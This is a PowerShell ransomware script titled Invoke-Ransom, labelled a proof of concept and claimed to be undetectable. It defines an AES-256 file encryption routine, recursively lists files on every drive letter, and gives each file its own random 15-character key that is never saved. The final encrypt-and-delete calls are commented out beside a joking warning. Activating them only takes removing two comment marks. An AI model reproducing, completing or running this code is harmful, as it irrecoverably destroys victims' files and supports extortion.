################################# #### PROOF OF CONCEPT #### #### PRICE-PER-KEY RANSOM #### ################################# <# .Synopsis This script will encrypt every file with its own encryption key on a users computer based on that users permissions. If run by System then some main System files will be encrypted also. Important files will not be touch so OS can still function. Will NOT run on Powershell 5. .NOTES Name: Invoke-Ransom Author: Elder4Ever Version: 1.0 DateCreated: 2022-08-30 Detection: Undetectable (as of 2022-08-30) Powershell Version: 7.0 or Higher .LINK No Link Yet #> function Invoke-AESEncryption { [CmdletBinding()] [OutputType([string])] Param ( [Parameter(Mandatory = $true)] [ValidateSet('Encrypt', 'Decrypt')] [String]$Mode, [Parameter(Mandatory = $true)] [String]$Key, [Parameter(Mandatory = $true, ParameterSetName = "CryptText")] [String]$Text, [Parameter(Mandatory = $true, ParameterSetName = "CryptFile")] [String]$Path ) Begin { $shaManaged = New-Object System.Security.Cryptography.SHA256Managed $aesManaged = New-Object System.Security.Cryptography.AesManaged $aesManaged.Mode = [System.Security.Cryptography.CipherMode]::CBC $aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::Zeros $aesManaged.BlockSize = 128 $aesManaged.KeySize = 256 } Process { $aesManaged.Key = $shaManaged.ComputeHash([System.Text.Encoding]::UTF8.GetBytes($Key)) switch ($Mode) { 'Encrypt' { if ($Text) {$plainBytes = [System.Text.Encoding]::UTF8.GetBytes($Text)} if ($Path) { $File = Get-Item -Path $Path -ErrorAction SilentlyContinue if (!$File.FullName) { Write-Error -Message "File not found!" break } $plainBytes = [System.IO.File]::ReadAllBytes($File.FullName) $outPath = $File.FullName + ".K9" } $encryptor = $aesManaged.CreateEncryptor() $encryptedBytes = $encryptor.TransformFinalBlock($plainBytes, 0, $plainBytes.Length) $encryptedBytes = $aesManaged.IV + $encryptedBytes $aesManaged.Dispose() if ($Text) {return [System.Convert]::ToBase64String($encryptedBytes)} if ($Path) { [System.IO.File]::WriteAllBytes($outPath, $encryptedBytes) (Get-Item $outPath).LastWriteTime = $File.LastWriteTime return "File encrypted to $outPath" } } 'Decrypt' { if ($Text) {$cipherBytes = [System.Convert]::FromBase64String($Text)} if ($Path) { $File = Get-Item -Path $Path -ErrorAction SilentlyContinue if (!$File.FullName) { Write-Error -Message "File not found!" break } $cipherBytes = [System.IO.File]::ReadAllBytes($File.FullName) $outPath = $File.FullName -replace ".K9" } $aesManaged.IV = $cipherBytes[0..15] $decryptor = $aesManaged.CreateDecryptor() $decryptedBytes = $decryptor.TransformFinalBlock($cipherBytes, 16, $cipherBytes.Length - 16) $aesManaged.Dispose() if ($Text) {return [System.Text.Encoding]::UTF8.GetString($decryptedBytes).Trim([char]0)} if ($Path) { [System.IO.File]::WriteAllBytes($outPath, $decryptedBytes) (Get-Item $outPath).LastWriteTime = $File.LastWriteTime return "File decrypted to $outPath" } } } } End { $shaManaged.Dispose() $aesManaged.Dispose() } } $Alphabet = "A:\","B:\","C:\Users\","C:\Program Files\","C:\Program Files (x86)\","D:\","E:\","F:\","G:\","H:\","I:\","J:\","K:\","L:\","M:\","N:\","O:\","P:\","Q:\","R:\","S:\","T:\","U:\","V:\","W:\","X:\","Y:\","Z:\" foreach($A in $Alphabet){ $File = Get-ChildItem "${A}" -Force -Recurse -ErrorAction SilentlyContinue foreach($F in $File){ IF((Get-Item $F) -isnot [System.IO.DirectoryInfo]){ if($F.Extension -ne ".K9"){ $Char1 = Get-Random -InputObject 'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','1','2','3','4','5','6','7','8','9','0','!','@','#','$','%','^','&','*','(',')','-','_' $Char2 = Get-Random -InputObject 'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','1','2','3','4','5','6','7','8','9','0','!','@','#','$','%','^','&','*','(',')','-','_' $Char3 = Get-Random -InputObject 'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','1','2','3','4','5','6','7','8','9','0','!','@','#','$','%','^','&','*','(',')','-','_' $Char4 = Get-Random -InputObject 'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','1','2','3','4','5','6','7','8','9','0','!','@','#','$','%','^','&','*','(',')','-','_' $Char5 = Get-Random -InputObject 'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','1','2','3','4','5','6','7','8','9','0','!','@','#','$','%','^','&','*','(',')','-','_' $Char6 = Get-Random -InputObject 'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','1','2','3','4','5','6','7','8','9','0','!','@','#','$','%','^','&','*','(',')','-','_' $Char7 = Get-Random -InputObject 'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','1','2','3','4','5','6','7','8','9','0','!','@','#','$','%','^','&','*','(',')','-','_' $Char8 = Get-Random -InputObject 'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','1','2','3','4','5','6','7','8','9','0','!','@','#','$','%','^','&','*','(',')','-','_' $Char9 = Get-Random -InputObject 'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','1','2','3','4','5','6','7','8','9','0','!','@','#','$','%','^','&','*','(',')','-','_' $Char10 = Get-Random -InputObject 'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','1','2','3','4','5','6','7','8','9','0','!','@','#','$','%','^','&','*','(',')','-','_' $Char11 = Get-Random -InputObject 'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','1','2','3','4','5','6','7','8','9','0','!','@','#','$','%','^','&','*','(',')','-','_' $Char12 = Get-Random -InputObject 'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','1','2','3','4','5','6','7','8','9','0','!','@','#','$','%','^','&','*','(',')','-','_' $Char13 = Get-Random -InputObject 'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','1','2','3','4','5','6','7','8','9','0','!','@','#','$','%','^','&','*','(',')','-','_' $Char14 = Get-Random -InputObject 'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','1','2','3','4','5','6','7','8','9','0','!','@','#','$','%','^','&','*','(',')','-','_' $Char15 = Get-Random -InputObject 'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','1','2','3','4','5','6','7','8','9','0','!','@','#','$','%','^','&','*','(',')','-','_' $Pass = "$Char1$Char2$Char3$Char4$Char5$Char6$Char7$Char8$Char9$Char10$Char11$Char12$Char13$Char14$Char15" #Write-Host $F.FullName" - $Pass" #######DONT UNCOMMENT BELOW UNLESS YOU WANT TO DESTROY SOMEONES DAY####### #Invoke-AESEncryption -Mode Encrypt -Key "$Pass" -Path $F #Remove-Item $F.FullName -Recurse -Force } } } }